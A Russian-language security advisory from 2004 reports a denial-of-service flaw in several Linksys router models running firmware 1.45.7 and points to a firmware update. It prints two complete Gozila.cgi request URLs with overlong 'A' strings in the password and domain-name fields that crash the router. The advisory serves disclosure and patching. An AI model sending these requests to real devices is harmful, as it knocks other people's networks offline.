Удалеенный отказ в обслуживании в нескольких Linksys маршрутизаторах
| Дата публикации: | 05.06.2004 |
| Всего просмотров: | 1083 |
| Опасность: | Средняя |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Linksys Routers Firmware 1.45.7; Models BEFSR41, BEFSR41 v3, BEFSRU31, BEFSR11, BEFSX41, BEFSR81 v2/v3, BEFW11S4 v3, и BEFW11S4 v4
Описание: Отказ в обслуживании обнаружен в нескольких Linksys маршрутизаторах. Удаленный пользователь может аварийно завершить работу устройства. Удаленный пользователь на внутренней сети может послать строку размером около 150 символов к sysPasswd и sysPasswdConfirm полям в 'Gozila.cgi' сценарии, чтобы аварийно завершить работу устройства. http://192.168.1.1/Gozila.cgi?sysPasswd=AAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&sysPasswdConfirm=AAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA&UPnP_Work=1&FactoryDefaults=0 http://192.168.1.1/Gozila.cgi?hostName=&DomainName=AAAA AAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA A AAAAAAAAAAAAAAA&WANConnectionSel=0&ipAddr1=192&ipAddr2=168& ipAddr3=1&ipAddr4=1&netMask=0&WANConnectionType=1 URL производителя:http://www.linksys.com/ Решение:Установите обновленную версию программы: http://www.linksys.com/download/firmware.asp ?fwid=3 |
|
| Ссылки: | DoS vuln in various versions of Linksys routers. |